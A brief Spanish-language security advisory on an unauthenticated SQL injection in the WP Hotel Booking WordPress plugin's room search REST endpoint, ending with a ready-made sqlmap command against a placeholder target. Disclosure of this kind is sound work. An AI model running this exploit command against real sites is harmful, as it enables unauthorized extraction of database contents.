
WP Hotel Booking <= 2.1.0 - Inyección SQL sin autenticación
WP Hotel Booking <= 2.1.0 - Inyección SQL no autenticada
El plugin WP Hotel Booking para WordPress es vulnerable a la inyección SQL a través del parámetro 'room_type' del endpoint /wphb/v1/rooms/search-rooms de la API REST en todas las versiones hasta la 2.1.0 incluida, debido a un escape insuficiente del parámetro proporcionado por el usuario y a la falta de preparación suficiente de la consulta SQL existente. Esto permite a atacantes no autenticados añadir consultas SQL adicionales a las consultas ya existentes, que pueden utilizarse para extraer información sensible de la base de datos.
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent